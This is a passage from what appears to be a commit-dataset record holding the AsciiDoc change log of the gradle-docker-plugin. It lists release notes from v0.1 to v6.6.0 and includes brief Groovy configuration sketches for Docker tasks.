`DockerLogsContainer` - {uri-github}\/pull\/181[Pull request 181]\n* Bump docker-java to v2.3.3 - {uri-github}\/pull\/183[Pull request 183]\n* Bug fix for not checking whether the parent dir already exists before creating it with `DockerCopyFileToContainer` - {uri-github}\/pull\/186[Pull request 186]\n* `DockerWaitContainer` now produces an exitCode - {uri-github}\/pull\/189[Pull request 189]\n* `apiVersion` can now be set on `DockerExtension` and overridden on all tasks - {uri-github}\/pull\/182[Pull request 182]\n* Internal fix where task variables had to be defined - {uri-github}\/pull\/194[Pull request 194]\n\n[discrete]\n=== v2.6.7 (March 10, 2016)\n\n* Upgrade to Gradle 2.11.\n* Bug fix for copying a single file from a container when hostPath is set to a directory for `DockerCopyFileFromContainer` - {uri-github}\/pull\/163[Pull request 163]\n* Step reports are now printed to stdout by default for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* UP-TO-DATE functionality has been removed from `DockerBuildImage` as there were too many corner cases to account for - {uri-github}\/pull\/172[Pull request 172]\n\n[discrete]\n=== v2.6.6 (February 27, 2016)\n\n* Added docker step reports for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* Added `onlyIf` check for `DockerBuildImage` - {uri-github}\/pull\/139[Pull request 139]\n* Added method logConfig for `DockerCreateContainer` - {uri-github}\/pull\/157[Pull request 157]\n* Various commands can now be passed closures for `Dockerfile` (see the sketch below) - {uri-github}\/pull\/155[Pull request 155]\n* Fix implementation of exposedPorts for `DockerCreateContainer` - {uri-github}\/pull\/140[Pull request 140]\n* Upgrade to Docker Java 2.2.2 - {uri-github}\/pull\/158[Pull request 158].
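\n\nA hedged sketch of closure-based instructions, assuming `from` is among the commands accepting closures and using a hypothetical project property for illustration:\n\n[source,groovy]\n----\nimport com.bmuschko.gradle.docker.tasks.image.Dockerfile\n\ntask createDockerfile(type: Dockerfile) {\n    \/\/ resolved when the task runs, not when the build script is evaluated\n    from { 'alpine:' + project.property('alpineVersion') }\n}\n----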
\n\n[discrete]\n=== v2.6.5 (January 16, 2016)\n\n* Fix implementation of `DockerCopyFileFromContainer` - {uri-github}\/pull\/135[Pull request 135].\n* Add `networkMode` property to `DockerCreateContainer` - {uri-github}\/pull\/114[Pull request 114].\n* Upgrade to Docker Java 2.1.4 - {uri-github}\/issues\/138[Issue 138].\n\n[discrete]\n=== v2.6.4 (December 24, 2015)\n\n* Expose privileged property on `DockerCreateContainer` - {uri-github}\/pull\/130[Pull request 130].\n\n[discrete]\n=== v2.6.3 (December 23, 2015)\n\n* Expose force and removeVolumes properties on `DockerRemoveContainer` - {uri-github}\/pull\/129[Pull request 129].\n\n[discrete]\n=== v2.6.2 (December 22, 2015)\n\n* Expose support for LogDriver on `DockerCreateContainer` - {uri-github}\/pull\/118[Pull request 118].\n* Upgrade to Docker Java 2.1.2.\n\n[discrete]\n=== v2.6.1 (September 21, 2015)\n\n* Correct the `withVolumesFrom` call on `DockerCreateContainer` task, which needs to get a `VolumesFrom[]` array as the parameter - {uri-github}\/pull\/102[Pull request 102].\n* Upgrade to Docker Java 2.1.1 - {uri-github}\/pull\/109[Pull request 109].\n\n[discrete]\n=== v2.6 (August 30, 2015)\n\n* Upgrade to Docker Java 2.1.0 - {uri-github}\/pull\/92[Pull request 92].\n_Note:_ The Docker Java API changed vastly with v2.0.0. The tasks `DockerBuildImage`, `DockerPullImage` and\n`DockerPushImage` do not provide a response handler anymore. This is a breaking change. Future versions of the plugin\nmight open up the response handling again in some way.\n* `DockerListImages` with `filter` calls a wrong function from `ListImagesCmdImpl.java` - {uri-github}\/issues\/105[Issue 105].\n\n[discrete]\n=== v2.5.2 (August 15, 2015)\n\n* Fix listImages task throwing GroovyCastException - {uri-github}\/issues\/96[Issue 96].\n* Add support for publishAll in DockerCreateContainer - {uri-github}\/pull\/94[Pull request 94].\n* Add optional dockerFile option to the DockerBuildImage task - {uri-github}\/pull\/47[Pull request 47].\n\n[discrete]\n=== v2.5.1 (July 29, 2015)\n\n* Adds Dockerfile support for the LABEL instruction - {uri-github}\/pull\/86[Pull request 86].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.4.0. The underlying API does not provide\nsetting port bindings for task `DockerStartContainer` anymore. They need to be set on `DockerCreateContainer` (see the sketch below).
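\n\nA minimal sketch of binding ports at container creation using 'hostPort:containerPort' strings (task and image names are illustrative; `portBindings` is the property added in v2.4 below):\n\n[source,groovy]\n----\nimport com.bmuschko.gradle.docker.tasks.container.DockerCreateContainer\n\ntask createWebContainer(type: DockerCreateContainer) {\n    targetImageId { 'example\/web:latest' }\n    portBindings = ['8080:8080']   \/\/ formerly configured on DockerStartContainer\n}\n----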
\n\n[discrete]\n=== v2.5 (July 18, 2015)\n\n* Expose response handler for `DockerListImages` task - {uri-github}\/issues\/75[Issue 75].\n* Pass in credentials when building an image - {uri-github}\/issues\/76[Issue 76].\n\n[discrete]\n=== v2.4.1 (July 4, 2015)\n\n* Add `extraHosts` property to task `DockerCreateContainer` - {uri-github}\/pull\/79[Pull request 79].\n* Add `pull` property to task `DockerBuildImage` - {uri-github}\/pull\/78[Pull request 78].\n\n[discrete]\n=== v2.4 (May 16, 2015)\n\n* Added missing support for properties `portBindings` and `cpuset` in `CreateContainer` - {uri-github}\/pull\/66[Pull request 66].\n* Expose response handlers so users can inject custom handling logic - {uri-github}\/issues\/65[Issue 65].\n* Upgrade to Gradle 2.4 including all compatible plugins and libraries.\n\n[discrete]\n=== v2.3.1 (April 25, 2015)\n\n* Added support for `Binds` when creating containers - {uri-github}\/pull\/54[Pull request 54].\n* Added task for copying files from a container to a host - {uri-github}\/pull\/57[Pull request 57].\n\n[discrete]\n=== v2.3 (April 18, 2015)\n\n* Added task `DockerInspectContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Added property `containerName` to task `DockerCreateContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Allow for linking containers for task `DockerCreateContainer` - {uri-github}\/pull\/53[Pull request 53].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.2.0.\n\n[discrete]\n=== v2.2 (April 12, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.1.0.\n\n[discrete]\n=== v2.1 (March 24, 2015)\n\n* Renamed property `registry` to `registryCredentials` for the plugin extension and tasks implementing `RegistryCredentialsAware` to better indicate its purpose.\n_Note:_ This is a breaking change.\n\n[discrete]\n=== v2.0.3 (March 20, 2015)\n\n* Allow for specifying port bindings for container start command. - {uri-github}\/issues\/30[Issue 30].\n* Throw an exception if an error response is encountered - {uri-github}\/issues\/37[Issue 37].\n* Upgrade to Gradle 2.3.\n\n[discrete]\n=== v2.0.2 (February 19, 2015)\n\n* Set source and target compatibility to Java 6 - {uri-github}\/issues\/32[Issue 32].\n\n[discrete]\n=== v2.0.1 (February 10, 2015)\n\n* Extension configuration method for `DockerJavaApplicationPlugin` needs to be registered via extension instance - {uri-github}\/issues\/28[Issue 28].\n\n[discrete]\n=== v2.0 (February 4, 2015)\n\n* Upgrade to Gradle 2.2.1 including all compatible plugins and libraries.\n\n[discrete]\n=== v0.8.3 (February 4, 2015)\n\n* Add project group to default tag built by Docker Java application plugin - {uri-github}\/issues\/25[Issue 25].\n\n[discrete]\n=== v0.8.2 (January 30, 2015)\n\n* Expose method for task `Dockerfile` for providing vanilla Docker instructions.\n\n[discrete]\n=== v0.8.1 (January 24, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.5.\n* Correctly create model instances for create container task - {uri-github}\/issues\/19[Issue 19].\n\n[discrete]\n=== v0.8 (January 7, 2015)\n\n* Allow for pushing to Docker Hub - {uri-github}\/issues\/18[Issue 18].\n* Better handling of API responses.\n* Note: Change to plugin extension. The property `docker.serverUrl` is now called `docker.url`. Instead of `docker.credentials`, you will need to use `docker.registry` (see the sketch below).
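\n\nA hedged sketch of the renamed extension properties (the nested credential fields are assumed, and all values are placeholders):\n\n[source,groovy]\n----\ndocker {\n    url = 'https:\/\/192.168.59.103:2376'   \/\/ formerly docker.serverUrl\n    registry {                             \/\/ formerly docker.credentials\n        username = 'user'\n        password = 'secret'\n    }\n}\n----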
\n\n[discrete]\n=== v0.7.2 (December 23, 2014)\n\n* `Dockerfile` task is always marked UP-TO-DATE after first execution - {uri-github}\/issues\/13[Issue 13].\n* Improvements to `Dockerfile` task - {uri-github}\/pull\/16[Pull request 16].\n * Fixed wrong assignment of key field in environment variable instruction.\n * Allow for providing multiple ports to the expose instruction.\n\n[discrete]\n=== v0.7.1 (December 16, 2014)\n\n* Fixed entry point definition of Dockerfile set by Java application plugin.\n\n[discrete]\n=== v0.7 (December 14, 2014)\n\n* Allow for properly adding user-based instructions to the Dockerfile task with predefined instructions without messing up the order. - {uri-github}\/issues\/12[Issue 12].\n* Renamed task `dockerCopyDistTar` to `dockerCopyDistResources` to better express intent.\n\n[discrete]\n=== v0.6.1 (December 11, 2014)\n\n* Allow for setting path to certificates for communicating with Docker over SSL - {uri-github}\/issues\/10[Issue 10].\n\n[discrete]\n=== v0.6 (December 7, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.4.\n* Added Docker Java application plugin.\n* Better documentation.\n\n[discrete]\n=== v0.5 (December 6, 2014)\n\n* Fixed implementations of tasks `DockerPushImage` and `DockerCommitImage` - {uri-github}\/issues\/11[Issue 11].\n\n[discrete]\n=== v0.4 (November 27, 2014)\n\n* Added task for creating a Dockerfile.\n\n[discrete]\n=== v0.3 (November 23, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.3.\n* Changed package name to `com.bmuschko.gradle.docker`.\n* Changed group ID to `com.bmuschko`.\n* Adapted plugin IDs to be compatible with Gradle's plugin portal.\n\n[discrete]\n=== v0.2 (June 19, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.8.2.\n* Provide custom task type for push operation.\n* Support for using remote URLs when building image - {uri-github}\/issues\/3[Issue 3].\n\n[discrete]\n=== v0.1 (May 11, 2014)\n\n* Initial release.\n","old_contents":"
","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"042993aaf3860dfe9b6d3ebe24c3c90bb72ac064","subject":"Add changes to release notes","message":"Add changes to release notes\n","repos":"bmuschko\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin","old_file":"src\/docs\/asciidoc\/50-changes.adoc","new_file":"src\/docs\/asciidoc\/50-changes.adoc","new_contents":"== Change Log\n\n[discrete]\n=== v6.6.0 (July 16, 2020)\n\n* Use configuration avoidance API in convention plugins - {uri-github}\/pull\/940[PR 940]\n* Configured registry credentials in build script should take precedence over Docker credential helper - {uri-github}\/pull\/945[PR 945]\n\n[discrete]\n=== v6.5.0 (July 3, 2020)\n\n* Default to Docker Hub when no registry is explicitly given - {uri-github}\/pull\/942[PR 942]\n* Upgrade of Docker Java library to version 3.2.5 and default the communication transport to Apache HttpClient 5 - {uri-github}\/pull\/942[PR 942]\n\n[discrete]\n=== v6.4.0 (March 23, 2020)\n\n* Keep the network name and network ID separate in `DockerCreateNetwork` (see the sketch below) - {uri-github}\/pull\/920[PR 920]\n* Upgrade ASM dependency to Java 13\/14-compatible version - {uri-github}\/pull\/929[PR 929]
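\n\nA minimal sketch of the name\/ID split, where the name is configured and the ID is reported back (the network name is illustrative, and the `networkName`\/`networkId` property names are assumed from PR 920):\n\n[source,groovy]\n----\nimport com.bmuschko.gradle.docker.tasks.network.DockerCreateNetwork\n\ntasks.register('createTestNetwork', DockerCreateNetwork) {\n    networkName.set('my-test-network')\n    doLast {\n        logger.quiet 'created network with id: ' + networkId.get()\n    }\n}\n----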
workingDir in `DockerExecContainer` task - {uri-github}\/pull\/927[PR 927]\n\n[discrete]\n=== v6.2.0 (March 10, 2020)\n\n* Upgrade Docker Java to next minor version - {uri-github}\/pull\/925[PR 925]\n* Expose property for providing extra hosts - {uri-github}\/pull\/926[PR 926]\n\n[discrete]\n=== v6.1.4 (February 23, 2020)\n\n* Nested property `FileInstruction.getFile()` renders a warning as it doesn't provide input or output annotation - {uri-github}\/issues\/919[Issue 919]\n\n[discrete]\n=== v6.1.3 (January 26, 2020)\n\n* Credentials helper JSON output parsing falls back to default if it cannot be read properly - {uri-github}\/pull\/909[PR 909]\n\n[discrete]\n=== v6.1.2 (January 14, 2020)\n\n* Decode base64 auth header - {uri-github}\/pull\/902[PR 902]\n\n[discrete]\n=== v6.1.1 (December 12, 2019)\n\n* Add debug logging in Docker configuration parsing - {uri-github}\/pull\/898[PR 898]\n\n[discrete]\n=== v6.1.0 (December 12, 2019)\n\n* Allow configuring the main class name for convention plugins - {uri-github}\/pull\/892[PR 892]\n* Do not parse config file if it doesn't exist - {uri-github}\/issues\/887[Issue 887]\n\n[discrete]\n=== v6.0.0 (November 16, 2019)\n\n* **Breaking Change!** Multi-tag support for push operation and convention plugins - {uri-github}\/pull\/867[PR 867]\n* **Breaking Change!** Renamed property `tags` to `images` for extensions `DockerJavaApplication` and `DockerSpringBootApplication`.\n* **Breaking Change!** Renamed property `tag` to `image` for custom tasks `DockerBuildImage`, `DockerCommitImage`, `DockerPullImage`, `DockerSaveImage`, `DockerListImages`, `DockerCreateContainer`.\n* **Breaking Change!** Removal of method `DockerPullImage.getImageId()`. Use `DockerPullImage.getImage()` instead.\n* **Breaking Change!** Host-related configuration properties in `DockerCreateContainer` have been moved to a nested property for better maintainability - {uri-github}\/pull\/873[PR 873]\n* Add properties `ipcMode` and `sysctls` to `DockerCreateContainer` - {uri-github}\/pull\/862[PR 862]\n* Gradle 6.0 compatibility fixes - {uri-github}\/pull\/869[PR 869]\n* Improve DSL for configuring registry credentials for custom tasks - {uri-github}\/pull\/879[PR 879]\n* Plugin resolves and uses Docker credential helper - {uri-github}\/pull\/865[PR 865]\n* Upgrade of Docker Java library to version 3.1.5\n\n[discrete]\n=== v5.3.0 (October 30, 2019)\n\n* Expose project-prop\/sys-prop\/env-var to optionally use netty-exec-cmd-factory - {uri-github}\/pull\/876[PR 876]\n\n[discrete]\n=== v5.2.0 (October 5, 2019)\n\n* **Potentially Breaking Change!** Remove duplicated code in convention plugins - {uri-github}\/pull\/864[PR 864]\n* Restore compatibility with Gradle 5.1 as runtime version - {uri-github}\/issues\/866[Issue 866]\n\n[discrete]\n=== v5.1.0 (September 18, 2019)\n\n* **Potentially Breaking Change!** Remove remaining use of Application Plugin in convention plugins - {uri-github}\/pull\/852[PR 852]\n\n[discrete]\n=== v5.0.0 (August 13, 2019)\n\n* **Breaking Change!** Remove exec\/cmd hooks in Docker application plugin - {uri-github}\/pull\/806[PR 806]\n* **Breaking Change!** API cleanup of Dockerfile task - {uri-github}\/pull\/812[PR 812]\n* **Breaking Change!** Removed `ItemJoiner` from public API - {uri-github}\/pull\/836[PR 836]\n* Respect symlinks in build context - {uri-github}\/issues\/837[Issue 837]\n\n[discrete]\n=== v4.10.0 (June 12, 2019)\n\n* Expose `target` property for BuildImageTask - {uri-github}\/pull\/813[PR 813]\n* Remove final from DockerBuildImage.labels property - {uri-github}\/pull\/823[PR 823]\n* Always set imageId within DockerBuildImage on success - {uri-github}\/pull\/819[PR 819]
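\n\nAs a migration aid for the v6.0.0 renames listed above, a minimal before\/after sketch for the Groovy DSL (the image name is a hypothetical placeholder):\n\n[source,groovy]\n----\ndocker {\n    javaApplication {\n        \/\/ up to v5.x\n        \/\/ tags.set(['myapp:latest'])\n\n        \/\/ v6.0.0 and later\n        images.set(['myapp:latest'])\n    }\n}\n----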
\n\n[discrete]\n=== v4.9.0 (May 25, 2019)\n\n* Avoid memory leakage by replacing addShutdownHook with Gradle.buildFinished - {uri-github}\/pull\/810[PR 810]\n* `DockerBuildImage` will print whole lines by collecting output and waiting for newline - {uri-github}\/pull\/799[PR 799]\n* `DockerBuildImage` reinstated ImageId output file and check in Docker registry - {uri-github}\/pull\/807[PR 807]\n\n[discrete]\n=== v4.8.1 (May 11, 2019)\n\n* Introduce `maintainer` property to extension of Spring Boot application plugin - {uri-github}\/issues\/779[Issue 779]\n* **Breaking Change!** Removed `RepositoriesFallbackPlugin` that was applied automatically - {uri-github}\/issues\/794[Issue 794]\n* **Breaking Change!** The Docker client in `AbstractDockerRemoteApiTask` is no longer injected into the method `runRemoteCommand` - {uri-github}\/issues\/802[Issue 802]\n\n[discrete]\n=== v4.8.0 (April 22, 2019)\n\n* Expose extension property for configuring JVM arguments - {uri-github}\/pull\/790[PR 790]\n\n[discrete]\n=== v4.7.1 (April 13, 2019)\n\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature] and has been replaced with `waitTime`.\n\n[discrete]\n=== v4.7.0 (April 9, 2019)\n\n* Tasks created by convention plugins should assign a task group - {uri-github}\/issues\/768[Issue 768]\n* Main class detection should work with a Kotlin-based application - {uri-github}\/issues\/766[Issue 766]\n* Fix Gradle `5.x` deprecation warnings - {uri-github}\/issues\/782[Issue 782]\n* Bump `docker-java` to `3.1.2` - {uri-github}\/issues\/787[Issue 787]\n\n[discrete]\n=== v4.6.2 (March 9, 2019)\n\n* Add shaded JAF dependency to simplify usage of plugin with Java 11 - {uri-github}\/issues\/764[Issue 764]\n\n[discrete]\n=== v4.6.1 (March 6, 2019)\n\n* Fix setting binds in `DockerCreateContainer` task - {uri-github}\/issues\/758[Issue 758]\n\n[discrete]\n=== v4.6.0 (March 3, 2019)\n\n* **Breaking Change!** Plugin declares and uses Docker Java as runtime library - {uri-github}\/pull\/751[PR 751]\n* **Breaking Change!** Custom task `DockerClient` has been renamed to `DockerOperation` to avoid conflicting with the Docker Java class name\n* Shade plugin dependencies except Docker Java - {uri-github}\/pull\/755[PR 755]\n\n[discrete]\n=== v4.5.0 (February 19, 2019)\n\n* `Dockerfile.FileInstruction` does not use flags if `Dockerfile.File` is passed in using a `Provider` - {uri-github}\/pull\/753[PR 753]\n* Inline main class finder and avoid explicit dependency on Spring Boot - {uri-github}\/pull\/752[PR 752]\n\n[discrete]\n=== v4.4.1 (February 5, 2019)\n\n* Cannot set publishAll property without error - {uri-github}\/pull\/742[PR 742]\n\n[discrete]\n=== v4.4.0 (January 31, 2019)\n\n* **Breaking Change!** Define image with more fine-grained image layers - {uri-github}\/pull\/736[PR 736]\n* Bump _docker-java-shaded_ to latest version - {uri-github}\/pull\/729[PR 729]\n* Task `DockerCreateContainer` gained option `groups` - {uri-github}\/pull\/731[Pull Request 731]\n\n[discrete]\n=== v4.3.0 (January 12, 2019)\n\n* **Breaking Change!** The task `DockerLoadImage` should use `Provider` type for image file\n* **Breaking Change!** Use the default value `$buildDir\/docker` for `DockerBuildImage.inputDir` to align with the default directory of the `Dockerfile` task\n* 
**Breaking Change!** Align task names in `DockerJavaApplicationPlugin` with the ones from the `DockerSpringBootApplicationPlugin`\n* Examples in user guide that demonstrate the creation of a custom Docker task and the modification of existing `Dockerfile` instructions\n\n[discrete]\n=== v4.2.0 (December 16, 2018)\n\n* Applying the Docker Spring Boot application plugin with the plugins DSL should not fail - {uri-github}\/issues\/702[Issue 702]\n* **Breaking Change!** Remove all deprecations - {uri-github}\/issues\/675[Issue 675]\n** Removed `DockerCreateContainer.env`, replaced by `DockerCreateContainer.envVars`\n** Removed `DockerBuildImage.tag`, replaced by `DockerBuildImage.tags`\n** Removed `DockerExecContainer.cmd`, replaced by `DockerExecContainer.commands`\n** Removed `DockerExecContainer.execId`, replaced by `DockerExecContainer.execIds`\n* `DockerBuildImage.tags.add\/addAll` only work after using `tags.set` - {uri-github}\/issues\/712[Issue 712]\n* User guide sample on Docker `links` should not use `doFirst` - {uri-github}\/issues\/715[Issue 715]\n* `DockerCommitImage` task should not fail when accessing container ID property value - {uri-github}\/issues\/718[Issue 718]\n\n[discrete]\n=== v4.1.0 (November 29, 2018)\n\n* Ensure compatibility with Gradle 5.0 - {uri-github}\/pull\/693[Pull Request 709]\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature]\n\n[discrete]\n=== v4.0.5 (November 22, 2018)\n\n* Avoid the use of application plugin extension to ensure compatibility - {uri-github}\/issues\/706[Issue 706]\n\n[discrete]\n=== v4.0.4 (November 4, 2018)\n\n* Implementation to make `DockerBuildImage` task incremental and cacheable is not sufficient - {uri-github}\/issues\/697[Issue 697]\n\n[discrete]\n=== v4.0.3 (October 30, 2018)\n\n* Correctly handle the case where `inputDir` is not where `dockerFile` is located - {uri-github}\/pull\/693[Pull Request 693]\n\n[discrete]\n=== v4.0.2 (October 27, 2018)\n\n* Output file name containing the image ID created by `DockerBuildImage` should work on Windows - {uri-github}\/pull\/690[Pull Request 690]\n\n[discrete]\n=== v4.0.1 (October 20, 2018)\n\n* Returned image ID for a `DockerBuildImage` task should never be null - {uri-github}\/pull\/687[Pull Request 687]\n\n[discrete]\n=== v4.0.0 (October 12, 2018)\n\n* **Breaking Change!** Use `Provider` concept throughout to support lazy evaluation via public API - {uri-github}\/pull\/659[Pull Request 659]\n* **Breaking Change!** Consumers of this plugin will have to use Java 8 or higher - {uri-github}\/pull\/676[Pull Request 676]\n* **Breaking Change!** Removal of `AbstractReactiveStreamsTask` from inherited custom task hierarchy\n* __NEW__ Add tested, multi-lingual user guide - {uri-github}\/pull\/677[Pull Request 677]\n* __NEW__ Make `DockerBuildImage` task incremental and cacheable - {uri-github}\/pull\/672[Pull Request 672]\n* Introduce method for translating username\/password into a PasswordCredentials - {uri-github}\/pull\/668[Pull Request 668]\n* Add `@CompileStatic` to much of the code base that can support it - {uri-github}\/pull\/676[Pull Request 676]\n* Use appropriate types for Groovy\/Kotlin DSL interoperability for reactive streams functionality - {uri-github}\/pull\/678[Pull Request 678]
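\n\nTo illustrate the lazy `Provider`-based configuration introduced in v4.0.0 above, a minimal sketch of a `DockerBuildImage` task (task name, directory, and tag are hypothetical placeholders):\n\n[source,groovy]\n----\nimport com.bmuschko.gradle.docker.tasks.image.DockerBuildImage\n\ntask buildMyImage(type: DockerBuildImage) {\n    \/\/ Property values are captured lazily and only resolved at execution time\n    inputDir.set(file('docker'))\n    tags.set(['myapp:latest'])\n}\n----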
\n\n[discrete]\n=== v3.6.2 (October 2, 2018)\n\n* `DockerCreateContainer` gained `pid` option - {uri-github}\/pull\/652[Pull Request 652]\n* `Dockerfile` validation takes into account comments - {uri-github}\/issues\/657[Issue 657]\n* Bump `docker-java-shaded` to `rc-5` - {uri-github}\/issues\/660[Issue 660]\n* `DockerBuildImage` gained `network` option - {uri-github}\/issues\/608[Issue 608]\n* `DockerCreateContainer` gained `autoRemove` option - {uri-github}\/issues\/639[Issue 639]\n\n[discrete]\n=== v3.6.1 (August 21, 2018)\n\n* Task `DockerClient`, and the passed dockerClient object, is now cached by configuration - {uri-github}\/pull\/644[Pull Request 644]\n* Task `DockerBuildImage` gained option `cacheFrom` - {uri-github}\/pull\/646[Pull Request 646]\n\n[discrete]\n=== v3.6.0 (August 7, 2018)\n\n* Use smaller base images for convention plugins - {uri-github}\/pull\/636[Pull Request 636]\n* Fully deprecate MAINTAINER instruction and replace with LABEL - {uri-github}\/pull\/635[Pull Request 635]\n* Make Dockerfile task cacheable via Gradle build cache - {uri-github}\/pull\/641[Pull Request 641]\n\n[discrete]\n=== v3.5.0 (July 24, 2018)\n\n* Support for dockerizing Spring Boot applications - {uri-github}\/pull\/619[Pull Request 619]\n* Removed deprecated `ResponseHandler` - {uri-github}\/pull\/624[Pull Request 624]\n* Introduce user guide for more readable, maintainable documentation - {uri-github}\/pull\/630[Pull Request 630]\n* Upgrade to Gradle Wrapper 4.9\n\n[discrete]\n=== v3.4.4 (July 15, 2018)\n\n* Task `DockerLivenessContainer` had its polling logic reworked to be more failure-proof.\n\n[discrete]\n=== v3.4.3 (July 8, 2018)\n\n* Task `DockerCreateContainer` has its method `withEnvVars` changed to accept a `def`, which in turn can be anything (String, Integer, Closure, etc.) but will eventually have all its keys\/values resolved to Java strings. - {uri-github}\/pull\/616[Pull Request 617]\n* Task `DockerLivenessContainer` had minor verbiage changes to its output. - {uri-github}\/pull\/616[Pull Request 617]\n* Use `-all` wrapper to better integrate with IDEs. - {uri-github}\/pull\/616[Pull Request 617]\n\n[discrete]\n=== v3.4.2 (July 7, 2018)\n\n* Shade cglib and its dependencies. - {uri-github}\/pull\/616[Pull Request 616]\n* Bump `docker-java` to `3.1.0-rc-3`. - {uri-github}\/pull\/616[Pull Request 616]\n\n[discrete]\n=== v3.4.1 (July 3, 2018)\n\n* BUGFIX for task `DockerCreateContainer` where `envs` were not being properly honored. - {uri-github}\/pull\/614[Pull Request 614]\n\n[discrete]\n=== v3.4.0 (July 1, 2018)\n\n* Task `Dockerfile` now supports multi-stage builds - {uri-github}\/pull\/607[Pull Request 607]\n* When plugin is applied to sub-projects we will additionally search rootProject for repos to use - {uri-github}\/pull\/610[Pull Request 610]\n* Task `DockerCreateContainer` has deprecated `env` in favor of `envVars`, which can ONLY be added to with a helper method `withEnvVar` that can be called **N** times for setting environment variables. - {uri-github}\/pull\/609[Pull Request 609]\n* Task `DockerLivenessProbeContainer` has been renamed to `DockerLivenessContainer`. Its `probe` method has been renamed to `livenessProbe`. Task `DockerExecStopContainer` had its `probe` method renamed to `execStopProbe`. - {uri-github}\/pull\/611[Pull Request 611]
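\n\nA minimal sketch of the `withEnvVar` helper described in the v3.4.0 entry above (task, image, and variable names are hypothetical placeholders):\n\n[source,groovy]\n----\nimport com.bmuschko.gradle.docker.tasks.container.DockerCreateContainer\n\ntask createMyContainer(type: DockerCreateContainer) {\n    targetImageId { 'myapp:latest' }  \/\/ placeholder image\n    \/\/ withEnvVar may be called N times, one variable per call\n    withEnvVar('DB_HOST', 'db')\n    withEnvVar('DB_PORT', '5432')\n}\n----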
\n\n[discrete]\n=== v3.3.6 (June 23, 2018)\n\n* Task `DockerCopyFileToContainer` can now copy **N** number of files via methods `withFile` and `withTarFile`. - {uri-github}\/pull\/605[Pull request 605]\n\n[discrete]\n=== v3.3.5 (June 17, 2018)\n\n* Fix bug within `DockerExecContainer` when `exitCode` can be null (default to 0 if so). - {uri-github}\/pull\/602[Pull request 602]\n\n[discrete]\n=== v3.3.4 (June 16, 2018)\n\n* Task `DockerExecContainer` gained ability to specify multiple execution commands to be run. - {uri-github}\/pull\/600[Pull request 600]\n* Various tasks had their progress logger output cleaned up. - {uri-github}\/pull\/601[Pull request 601]\n\n[discrete]\n=== v3.3.3 (June 8, 2018)\n\n* Explicitly call `toString()` on values in maps passed to Docker API. - {uri-github}\/pull\/595[Pull request 595]\n* Task `DockerLivenessProbeContainer` gained method `lastInspection()` which will return the last \"docker inspect container\" response AFTER execution has completed. - {uri-github}\/pull\/596[Pull request 596]\n\n[discrete]\n=== v3.3.2 (June 5, 2018)\n\n* Task `DockerLivenessProbeContainer` now has the `probe` option set to optional and if NOT defined will fall back to checking if the container is in a running state. - {uri-github}\/pull\/594[Pull request 594]\n\n[discrete]\n=== v3.3.1 (June 2, 2018)\n\n* Various minor refactorings surrounding new task `DockerExecStopContainer`. - {uri-github}\/pull\/592[Pull request 592]\n\n[discrete]\n=== v3.3.0 (June 1, 2018)\n\n* Added task `DockerClient` to pass the raw `docker-java` client to the `onNext` closure if defined. - {uri-github}\/pull\/589[Pull request 589]\n* Task `DockerCreateContainer` will now log the `containerName` if set, which is the standard within this plugin, otherwise fall back to the just-created `containerId`.\n* Task `DockerExecContainer` gained option `successOnExitCodes` to allow the user to define a list of successful exit codes the exec is allowed to return, failing if the actual code is not in the list. Default behavior is to perform no check. - {uri-github}\/pull\/590[Pull request 590]\n* Added task `DockerLivenessProbeContainer` which will poll, for some defined amount of time, a running container's logs looking for a given message and fail if not found. - {uri-github}\/pull\/587[Pull request 587]\n* Added task `DockerExecStopContainer` to allow the user to execute an arbitrary cmd against a container, polling for it to enter a non-running state, and if that does not succeed in time, issue a stop request. - {uri-github}\/pull\/591[Pull request 591]\n\n[discrete]\n=== v3.2.9 (May 22, 2018)\n\n* Fixed a bug in task `DockerCreateContainer` where option `cpuset` is now renamed differently in `docker-java`. - {uri-github}\/pull\/585[Pull request 585]\n\n[discrete]\n=== v3.2.8 (April 30, 2018)\n\n* Task `DockerExecContainer` gained option `user` to specify a user\/group. - {uri-github}\/pull\/574[Pull request 574]\n* Task `DockerCreateContainer` gained option `ipV4Address` to specify a specific IPv4 address to use. - {uri-github}\/pull\/449[Pull request 449]\n* Bump Gradle to `4.7`. - {uri-github}\/pull\/578[Pull request 578]\n\n[discrete]\n=== v3.2.7 (April 19, 2018)\n\n* Task `DockerSaveImage` gained option `useCompression` to optionally gzip the created tar. - {uri-github}\/pull\/565[Pull request 565]\n* Add `javax.activation` dependency for users who are working with JDK 9+. - {uri-github}\/pull\/572[Pull request 572]\n\n[discrete]\n=== v3.2.6 (March 31, 2018)\n\n* Cache the `docker-java` client instead of recreating it for every request\/task invocation. This is a somewhat big internal change but has a lot of consequences and so it was deserving of its own point release. 
